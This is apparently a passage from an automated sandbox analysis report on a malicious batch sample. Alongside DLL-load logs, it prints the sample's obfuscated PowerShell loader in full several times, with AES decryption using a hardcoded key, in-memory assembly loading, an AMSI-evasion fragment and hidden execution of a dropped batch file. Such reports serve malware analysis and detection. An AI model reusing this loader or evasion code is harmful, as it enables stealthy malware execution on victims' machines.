Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 1 (2).cmdStatic file information: File size 5285337 > 1048576

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($WzFkwARTzpFLOf,$PEmsRMlCSlPDgPcGUWk).Invoke('a'+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$BtHEHTUmMhFSXEmPh=$YLRtgUHBybAeSz.Invoke($Null,@([O
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](114)+''+[Char](98)+'x-s'+'t'+
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression 